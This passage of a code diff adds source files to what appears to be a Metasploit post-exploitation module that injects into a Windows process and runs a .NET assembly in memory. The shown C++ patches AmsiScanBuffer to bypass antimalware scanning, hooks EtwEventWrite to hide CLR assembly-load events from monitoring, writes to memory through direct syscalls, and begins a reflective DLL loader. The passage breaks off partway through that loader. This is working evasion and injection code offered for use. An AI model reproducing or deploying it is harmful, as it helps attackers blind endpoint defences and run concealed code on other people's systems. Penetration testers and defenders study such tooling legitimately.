+	BOOL isloaded = ClrIsLoaded(clrVersion, pEnumerator, (VOID**)&pRuntimeInfo);
+
+	if(!isloaded)
+	{
+		hr = pMetaHost->GetRuntime(clrVersion, IID_ICLRRuntimeInfo, (VOID**)&pRuntimeInfo);
+
+		if (FAILED(hr))
+		{
+			wprintf(L"Cannot get the required CLR version (%s) w/hr 0x%08lx\n", clrVersion, hr);
+			return -1;
+		}
+
+		hr = pRuntimeInfo->IsLoadable(&bLoadable);
+
+		if (FAILED(hr) || !bLoadable)
+		{
+			wprintf(L"Cannot load the required CLR version (%s) w/hr 0x%08lx\n", clrVersion, hr);
+			return -1;
+		}
+	}
+
+	hr = pRuntimeInfo->GetInterface(CLSID_CorRuntimeHost, IID_ICorRuntimeHost, (VOID**)&pRuntimeHost);
+
+	if(FAILED(hr))
+	{
+		printf("ICLRRuntimeInfo::GetInterface failed w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	if (!isloaded)
+	{
+		hr = pRuntimeHost->Start();
+	}
+
+	if(FAILED(hr))
+	{
+		printf("CLR failed to start w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	hr = pRuntimeHost->GetDefaultDomain(&pAppDomainThunk);
+
+	if(FAILED(hr))
+	{
+		printf("ICorRuntimeHost::GetDefaultDomain failed w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	hr = pAppDomainThunk->QueryInterface(__uuidof(_AppDomain), (VOID**) &pDefaultAppDomain);
+
+	if(FAILED(hr))
+	{
+		printf("Failed to get default AppDomain w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	//Amsi bypass
+	if (amsiflag[0] == '\x01')
+	{
+		int ptcResult = PatchAmsi();
+		if (ptcResult == -1)
+		{
+			printf("Amsi bypass failed\n");
+			return -1;
+		}
+	}
+
+	hr = pDefaultAppDomain->Load_3(pSafeArray, &pAssembly);
+
+	if(FAILED(hr))
+	{
+		printf("Failed pDefaultAppDomain->Load_3 w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	hr = pAssembly->get_EntryPoint(&pMethodInfo);
+
+	if(FAILED(hr))
+	{
+		printf("Failed pAssembly->get_EntryPoint w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	ZeroMemory(&retVal, sizeof(VARIANT));
+	ZeroMemory(&obj, sizeof(VARIANT));
+	
+	obj.vt = VT_NULL;
+	vtPsa.vt = (VT_ARRAY | VT_BSTR);
+
+	//Managing parameters
+	if(arg_s[0] != '\x00')
+	{
+		//if we have at least 1 parameter set cEleemnt to 1
+		psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 1);
+
+		LPWSTR *szArglist;
+		int nArgs;
+		wchar_t *wtext = (wchar_t *)malloc((sizeof(wchar_t) * raw_args_length +1));
+
+		mbstowcs(wtext, (char *)arg_s, raw_args_length + 1);
+		szArglist = CommandLineToArgvW(wtext, &nArgs);
+
+		free(wtext);
+
+		vtPsa.parray = SafeArrayCreateVector(VT_BSTR, 0, nArgs);
+
+		for(long i = 0;i< nArgs;i++)
+		{
+			size_t converted;
+			size_t strlength = wcslen(szArglist[i]) + 1;
+			OLECHAR *sOleText1 = new OLECHAR[strlength];
+			char * buffer = (char *)malloc(strlength * sizeof(char));
+			
+			wcstombs(buffer, szArglist[i], strlength);
+			
+			mbstowcs_s(&converted, sOleText1, strlength, buffer, strlength);
+			BSTR strParam1 = SysAllocString(sOleText1);
+
+			SafeArrayPutElement(vtPsa.parray, &i, strParam1);
+			free(buffer);
+		}
+
+		long iEventCdIdx(0);
+		hr = SafeArrayPutElement(psaStaticMethodArgs, &iEventCdIdx, &vtPsa);
+	}
+	else
+	{
+		//if no parameters set cEleemnt to 0
+		psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 0);
+	}
+	
+	//Assembly execution
+	hr = pMethodInfo->Invoke_3(obj, psaStaticMethodArgs, &retVal);
+
+	if(FAILED(hr))
+	{
+		printf("Failed pMethodInfo->Invoke_3  w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	wprintf(L"Succeeded\n");
+	
+	return 0;
+}
+
+VOID Execute(LPVOID lpPayload)
+{
+	if (!AttachConsole(-1))
+		AllocConsole();
+
+	executeSharp(lpPayload);
+
+}
+
+BOOL FindVersion(void * assembly, int length)
+{
+	char* assembly_c;
+	assembly_c = (char*)assembly;
+	
+	for (int i = 0; i < length; i++)
+	{
+		for (int j = 0; j < 10; j++)
+		{
+			if (sig_40[j] != assembly_c[i + j])
+			{
+				break;
+			}
+			else
+			{
+				if (j == (9))
+				{
+					return TRUE;
+				}
+			}
+		}
+	}
+
+	return FALSE;
+}
+
+ULONG NTAPI MyEtwEventWrite(
+	__in REGHANDLE RegHandle,
+	__in PCEVENT_DESCRIPTOR EventDescriptor,
+	__in ULONG UserDataCount,
+	__in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData)
+{
+	ULONG uResult = 0;
+
+	_EtwEventWriteFull EtwEventWriteFull = (_EtwEventWriteFull)
+		GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWriteFull");
+	if (EtwEventWriteFull == NULL) {
+		return 1;
+	}
+
+	switch (EventDescriptor->Id) {
+	case AssemblyDCStart_V1:
+		// Block CLR assembly loading events.
+		break;
+	case MethodLoadVerbose_V1:
+		// Block CLR method loading events.
+		break;
+	case ILStubGenerated:
+		// Block MSIL stub generation events.
+		break;
+	default:
+		// Forward all other ETW events using EtwEventWriteFull.
+		uResult = EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData);
+	}
+
+	return uResult;
+}
+
+INT InlinePatch(LPVOID lpFuncAddress, UCHAR * patch, int patchsize) {
+	PNT_TIB pTIB = NULL;
+	PTEB pTEB = NULL;
+	PPEB pPEB = NULL;
+
+	// Get pointer to the TEB
+	pTIB = (PNT_TIB)__readgsqword(0x30);
+	pTEB = (PTEB)pTIB->Self;
+
+	// Get pointer to the PEB
+	pPEB = (PPEB)pTEB->ProcessEnvironmentBlock;
+	if (pPEB == NULL) {
+		return -1;
+	}
+
+	if (pPEB->OSMajorVersion == 10 && pPEB->OSMinorVersion == 0) {
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory10;
+	}
+	else if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 1 && pPEB->OSBuildNumber == 7601) {
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;
+	}
+	else if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 2) {
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory80;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory80;
+	}
+	else if (pPEB->OSMajorVersion == 6 && pPEB->OSMinorVersion == 3) {
+		ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
+		ZwWriteVirtualMemory = &ZwWriteVirtualMemory81;
+	}
+	else {
+
+		return -2;
+	}
+
+	LPVOID lpBaseAddress = lpFuncAddress;
+	ULONG OldProtection, NewProtection;
+	SIZE_T uSize = patchsize;
+	NTSTATUS status = ZwProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
+	if (status != STATUS_SUCCESS) {
+		return -1;
+	}
+
+	status = ZwWriteVirtualMemory(NtCurrentProcess(), lpFuncAddress, (PVOID)patch, patchsize, NULL);
+	if (status != STATUS_SUCCESS) {
+		return -1;
+	}
+
+	status = ZwProtectVirtualMemory(NtCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);
+	if (status != STATUS_SUCCESS) {
+		return -1;
+	}
+
+	return 0;
+}
+
+BOOL PatchEtw()
+{
+	HMODULE lib = LoadLibraryA("ntdll.dll");
+	if (lib == NULL)
+	{
+		wprintf(L"Cannot load ntdll.dll");
+		return -2;
+	}
+	LPVOID lpFuncAddress = GetProcAddress(lib, "EtwEventWrite");
+	if (lpFuncAddress == NULL)
+	{
+		wprintf(L"Cannot get address of EtwEventWrite");
+		return -2;
+	}
+
+	// Add address of hook function to patch.
+	*(DWORD64*)&uHook[2] = (DWORD64)MyEtwEventWrite;
+
+	return InlinePatch(lpFuncAddress, uHook,sizeof(uHook));
+}
+
+BOOL PatchAmsi()
+{
+
+	HMODULE lib = LoadLibraryA("amsi.dll");
+	if (lib == NULL)
+	{
+		printf("Cannot load amsi.dll");
+		return -2;
+	}
+
+	LPVOID addr = GetProcAddress(lib, "AmsiScanBuffer");
+	if(addr == NULL)
+	{
+		printf("Cannot get address of AmsiScanBuffer");
+		return -2;
+	}
+
+	return InlinePatch(addr, amsipatch, sizeof(amsipatch));
+}
+
+BOOL ClrIsLoaded(LPCWSTR version, IEnumUnknown* pEnumerator, LPVOID * pRuntimeInfo) {
+	HRESULT hr;
+	ULONG fetched = 0;
+	DWORD vbSize;
+	BOOL retval = FALSE;
+	wchar_t currentversion[260];
+
+	while (SUCCEEDED(pEnumerator->Next(1, (IUnknown **)&pRuntimeInfo, &fetched)) && fetched > 0) 
+	{
+		hr = ((ICLRRuntimeInfo*)pRuntimeInfo)->GetVersionString(currentversion, &vbSize);
+		if (!FAILED(hr))
+		{
+			if (wcscmp(currentversion, version) == 0)
+			{
+				retval = TRUE;
+				break;
+			}
+		}
+	}
+
+	return retval;
+}
+
+
+
+

external/source/HostingCLR_inject/HostingCLR/HostingCLR.h

@@ -0,0 +1,23 @@
+#pragma once
+#include <io.h>
+#include <stdio.h>
+#include <tchar.h>
+#include <metahost.h>
+
+
+#pragma comment(lib, "MSCorEE.lib")
+
+#import "mscorlib.tlb" raw_interfaces_only				\
+    high_property_prefixes("_get","_put","_putref")		\
+    rename("ReportEvent", "InteropServices_ReportEvent")
+
+#define STATUS_SUCCESS 0
+#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
+
+using namespace mscorlib;
+
+VOID Execute(LPVOID lpPayload);
+BOOL FindVersion(void * assembly, int length);
+BOOL PatchAmsi();
+BOOL ClrIsLoaded(LPCWSTR versione, IEnumUnknown* pEnumerator, LPVOID * pRuntimeInfo);
+INT InlinePatch(LPVOID lpFuncAddress, UCHAR * patch, int patchsize);

external/source/HostingCLR_inject/HostingCLR/HostingCLR.vcxproj

@@ -0,0 +1,178 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{C5ADDA72-8591-417A-BCE3-279EC6960FE2}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>HostingCLR</RootNamespace>
+    <WindowsTargetPlatformVersion>7.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v140_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v140_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v140_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v140_xp</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName)$(Platform)</TargetName>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName)$(Platform)</TargetName>
+    <OutDir>..\..\..\..\data\post\execute-dotnet-assembly</OutDir>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>_X32;WIN32;NDEBUG;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <AdditionalLibraryDirectories>C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\lib\amd64</AdditionalLibraryDirectories>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>_X64;WIN32;NDEBUG;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <CompileAs>Default</CompileAs>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <AdditionalLibraryDirectories>C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\lib\amd64</AdditionalLibraryDirectories>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="EtwTamper.h" />
+    <ClInclude Include="HostingCLR.h" />
+    <ClInclude Include="ReflectiveDLLInjection.h" />
+    <ClInclude Include="ReflectiveLoader.h" />
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="Executer.cpp" />
+    <ClCompile Include="HostingCLR.cpp" />
+    <ClCompile Include="ReflectiveLoader.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="Syscalls.asm">
+      <FileType>Document</FileType>
+      <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild>
+    </MASM>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>

external/source/HostingCLR_inject/HostingCLR/HostingCLR.vcxproj.filters

@@ -0,0 +1,56 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Sources">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Headers">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resources">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+    <ClInclude Include="ReflectiveLoader.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+    <ClInclude Include="ReflectiveDLLInjection.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+    <ClInclude Include="HostingCLR.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+    <ClInclude Include="EtwTamper.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="HostingCLR.cpp">
+      <Filter>Sources</Filter>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Sources</Filter>
+    </ClCompile>
+    <ClCompile Include="Executer.cpp">
+      <Filter>Sources</Filter>
+    </ClCompile>
+    <ClCompile Include="ReflectiveLoader.cpp">
+      <Filter>Sources</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="Syscalls.asm">
+      <Filter>Sources</Filter>
+    </MASM>
+  </ItemGroup>
+</Project>

external/source/HostingCLR_inject/HostingCLR/ReflectiveDLLInjection.h

@@ -0,0 +1,55 @@
+#pragma once
+
+//===============================================================================================//
+// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+
+// we declare some common stuff in here...
+
+#define DLL_METASPLOIT_ATTACH	4
+#define DLL_METASPLOIT_DETACH	5
+#define DLL_QUERY_HMODULE		6
+
+#define DEREF( name )*(UINT_PTR *)(name)
+#define DEREF_64( name )*(DWORD64 *)(name)
+#define DEREF_32( name )*(DWORD *)(name)
+#define DEREF_16( name )*(WORD *)(name)
+#define DEREF_8( name )*(BYTE *)(name)
+
+typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID);
+typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
+
+#define DLLEXPORT __declspec( dllexport ) 
+
+//===============================================================================================//
+#endif
+//===============================================================================================//

external/source/HostingCLR_inject/HostingCLR/ReflectiveLoader.cpp

@@ -0,0 +1,600 @@
+//===============================================================================================//
+// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#include "stdafx.h"
+#include "ReflectiveLoader.h"
+//===============================================================================================//
+// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
+HINSTANCE hAppInstance = NULL;
+//===============================================================================================//
+#pragma intrinsic( _ReturnAddress )
+// This function can not be inlined by the compiler or we will not get the address we expect. Ideally 
+// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of 
+// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics 
+// available (and no inline asm available under x64).
+__declspec(noinline) ULONG_PTR caller(VOID) { return (ULONG_PTR)_ReturnAddress(); }
+//===============================================================================================//
+
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str)
+#else /* ENABLE_OUTPUTDEBUGSTRING */
+#define OUTPUTDBG(str) do{}while(0)
+#endif
+
+// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,  
+//         otherwise the DllMain at the end of this file will be used.
+
+// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
+//         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
+
+// This is our position independent reflective DLL loader/injector
+#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader(LPVOID lpParameter)
+#else
+DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader(VOID)
+#endif
+{
+	// the functions we need
+	LOADLIBRARYA pLoadLibraryA = NULL;
+	GETPROCADDRESS pGetProcAddress = NULL;
+	VIRTUALALLOC pVirtualAlloc = NULL;
+	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
+#ifdef ENABLE_STOPPAGING
+	VIRTUALLOCK pVirtualLock = NULL;
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+	OUTPUTDEBUG pOutputDebug = NULL;
+#endif
+
+	USHORT usCounter;
+
+	// the initial location of this image in memory
+	ULONG_PTR uiLibraryAddress;
+	// the kernels base address and later this images newly loaded base address
+	ULONG_PTR uiBaseAddress;
+
+	// variables for processing the kernels export table
+	ULONG_PTR uiAddressArray;
+	ULONG_PTR uiNameArray;
+	ULONG_PTR uiExportDir;
+	ULONG_PTR uiNameOrdinals;
+	DWORD dwHashValue;
+
+	// variables for loading this image
+	ULONG_PTR uiHeaderValue;
+	ULONG_PTR uiValueA;
+	ULONG_PTR uiValueB;
+	ULONG_PTR uiValueC;
+	ULONG_PTR uiValueD;
+	ULONG_PTR uiValueE;
+
+	// STEP 0: calculate our images current base address
+
+	// we will start searching backwards from our callers return address.
+	uiLibraryAddress = caller();
+
